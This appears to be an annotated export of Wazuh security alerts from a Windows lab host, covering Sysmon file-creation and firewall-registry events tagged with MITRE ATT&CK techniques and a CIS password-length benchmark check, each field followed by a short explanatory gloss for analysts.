data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:41:13.6190305Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 225972 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-20 01:41:13.600
ProcessGuid: {94294ddc-50b9-6804-bf08-000000000e00}
ProcessId: 10860
Image: C:\WINDOWS\SystemTemp\chrome_Unpacker_BeginUnzipping12284_132767381\CR_72F4F.tmp\setup.exe
TargetFilename: C:\Windows\System32\config\systemprofile\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
CreationUtcTime: 2025-04-12 15:52:55.107
User: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:41:13.600 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-50b9-6804-bf08-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 10860 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\SystemTemp\\chrome_Unpacker_BeginUnzipping12284_132767381\\CR_72F4F.tmp\\setup.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\System32\\config\\systemprofile\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Google Chrome.lnk No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-12 15:52:55.107 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules\\{F4DF00BD-4AEA-44E9-91CE-FDCCFF1F019F} binary is: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe|Name=025e84dc-434c-4cde-a1c0-1932db2c81a4|Desc=Inbound rule for Microsoft Edge to allow mDNS traffic.|EmbedCtxt=Microsoft Edge|
🧠 What happened? Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules\\{F4DF00BD-4AEA-44E9-91CE-FDCCFF1F019F} binary is: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe|Name=025e84dc-434c-4cde-a1c0-1932db2c81a4|Desc=Inbound rule for Microsoft Edge to allow mDNS traffic.|EmbedCtxt=Microsoft Edge|
🔍 Why it's important: Critical or commonly abused ATT&CK technique
rule.description: Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules\\{F4DF00BD-4AEA-44E9-91CE-FDCCFF1F019F} binary is: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe|Name=025e84dc-434c-4cde-a1c0-1932db2c81a4|Desc=Inbound rule for Microsoft Edge to allow mDNS traffic.|EmbedCtxt=Microsoft Edge| Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92307 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1543.003'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Persistence', 'Privilege Escalation'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Windows Service'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 5 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid13_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534067.616369 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 13 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 13 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:41:49.4998048Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 227426 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Registry value set:
RuleName: -
EventType: SetValue
UtcTime: 2025-04-20 01:41:49.499
ProcessGuid: {94294ddc-ea86-67fe-3b00-000000000e00}
ProcessId: 2892
Image: C:\WINDOWS\system32\svchost.exe
TargetObject: HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{F4DF00BD-4AEA-44E9-91CE-FDCCFF1F019F}
Details: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe|Name=025e84dc-434c-4cde-a1c0-1932db2c81a4|Desc=Inbound rule for Microsoft Edge to allow mDNS traffic.|EmbedCtxt=Microsoft Edge|
User: NT AUTHORITY\LOCAL SERVICE" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.eventType: SetValue No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:41:49.499 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-ea86-67fe-3b00-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 2892 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\system32\\svchost.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetObject: HKLM\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules\\{F4DF00BD-4AEA-44E9-91CE-FDCCFF1F019F} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.details: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe|Name=025e84dc-434c-4cde-a1c0-1932db2c81a4|Desc=Inbound rule for Microsoft Edge to allow mDNS traffic.|EmbedCtxt=Microsoft Edge| No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\LOCAL SERVICE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 3 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534068.620707 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:42:01.5524130Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 228128 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-20 01:42:01.551
ProcessGuid: {94294ddc-50a4-6804-a108-000000000e00}
ProcessId: 11932
Image: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\chrome_Unpacker_BeginUnzipping11932_114863717\manifest.json
CreationUtcTime: 2025-04-20 01:42:01.551
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:42:01.551 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-50a4-6804-a108-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 11932 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\chrome_Unpacker_BeginUnzipping11932_114863717\\manifest.json No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-20 01:42:01.551 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 4 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534068.623580 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:42:01.5530634Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 228129 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-20 01:42:01.551
ProcessGuid: {94294ddc-50a4-6804-a108-000000000e00}
ProcessId: 11932
Image: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\chrome_Unpacker_BeginUnzipping11932_114863717\sets.json
CreationUtcTime: 2025-04-20 01:42:01.551
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:42:01.551 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-50a4-6804-a108-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 11932 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\chrome_Unpacker_BeginUnzipping11932_114863717\\sets.json No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-20 01:42:01.551 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 5 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534068.626437 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:42:01.5553469Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 228131 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-20 01:42:01.553
ProcessGuid: {94294ddc-50a4-6804-a108-000000000e00}
ProcessId: 11932
Image: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\chrome_Unpacker_BeginUnzipping11932_114863717\_metadata\verified_contents.json
CreationUtcTime: 2025-04-20 01:42:01.553
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:42:01.553 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-50a4-6804-a108-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 11932 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\chrome_Unpacker_BeginUnzipping11932_114863717\\_metadata\\verified_contents.json No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-20 01:42:01.553 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Minimum password length' is set to '14 or more character(s)'.: Status changed from failed to 'not applicable'
🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Minimum password length' is set to '14 or more character(s)'.: Status changed from failed to 'not applicable'
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Minimum password length' is set to '14 or more character(s)'.: Status changed from failed to 'not applicable' Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19013 Numeric ID of the detection rule that fired.
rule.firedtimes: 2 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['1.1.4'] Maps to CIS benchmark controls – governance folks love this.
rule.cis_csc: ['5.2'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534071.629391 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 2137254061 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26003 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Minimum password length' is set to '14 or more character(s)'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting determines the least number of characters that make up a password for a user account. There are many different theories about how to determine the best password length for an organization, but perhaps 'passphrase' is a better term than 'password.' In Microsoft Windows 2000 and newer, passphrases can be quite long and can include spaces. Therefore, a phrase such as 'I want to drink a $5 milkshake' is a valid passphrase; it is a considerably stronger password than an 8 or 10 character string of random numbers and letters, and yet is easier to remember. Users must be educated about the proper selection and maintenance of passwords, especially with regard to password length. In enterprise environments, the ideal value for the Minimum password length setting is 14 characters, however you should adjust this value to meet your organization's business requirements. The recommended state for this setting is: 14 or more character(s). Note: In Windows Server 2016 and older versions of Windows Server, the GUI of the Local Security Policy (LSP), Local Group Policy Editor (LGPE) and Group Policy Management Editor (GPME) would not let you set this value higher than 14 characters. However, starting with Windows Server 2019, Microsoft changed the GUI to allow up to a 20 character minimum password length. Note #2: Password Policy settings (section 1.1) and Account Lockout Policy settings (section 1.2) must be applied via the Default Domain Policy GPO in order to be globally in effect on domain user accounts as their default behavior. If these settings are configured in another GPO, they will only affect local user accounts on the computers that receive the GPO. However, custom exceptions to the default password policy and account lockout policy rules for specific domain users and/or groups can be defined using Password Settings Objects (PSOs), which are completely separate from Group Policy and most easily configured using Active Directory Administrative Center. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: Types of password attacks include dictionary attacks (which attempt to use common words and phrases) and brute force attacks (which try every possible combination of characters). Also, attackers sometimes try to obtain the account database so they can use tools to discover the accounts and passwords. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to 14 or more character(s): Computer Configuration\Policies\Windows Settings\Security Settings\Account Policies\Password Policy\Minimum password length Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 1.1.4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.cis_csc: 5.2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.command: ['net.exe accounts'] Shell/registry query used in the test – reproduce it yourself when verifying.
data.sca.check.result: not applicable PASS or FAIL. Red = needs fixing.
data.sca.check.reason: Timeout overtaken running command 'net.exe accounts' No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.previous_result: failed Last run’s pass/fail – trend spotting for drift.
location: sca Which log source produced the event (e.g., sysmon, auditd).
- 4. Document findings and escalate to Team Lead if needed.
Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules\\{B5C681E4-1680-4090-A10F-6F4486F58558} binary is: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\135.0.3179.85\\msedgewebview2.exe|Name=Microsoft Edge (mDNS-In)|Desc=Inbound rule for Microsoft Edge to allow mDNS traffic.|EmbedCtxt=Microsoft Edge WebView2 Runtime|
🧠 What happened? Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules\\{B5C681E4-1680-4090-A10F-6F4486F58558} binary is: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\135.0.3179.85\\msedgewebview2.exe|Name=Microsoft Edge (mDNS-In)|Desc=Inbound rule for Microsoft Edge to allow mDNS traffic.|EmbedCtxt=Microsoft Edge WebView2 Runtime|
🔍 Why it's important: Critical or commonly abused ATT&CK technique
rule.description: Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules\\{B5C681E4-1680-4090-A10F-6F4486F58558} binary is: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\135.0.3179.85\\msedgewebview2.exe|Name=Microsoft Edge (mDNS-In)|Desc=Inbound rule for Microsoft Edge to allow mDNS traffic.|EmbedCtxt=Microsoft Edge WebView2 Runtime| Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92307 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1543.003'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Persistence', 'Privilege Escalation'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Windows Service'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 6 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid13_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534073.635871 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 13 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 13 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
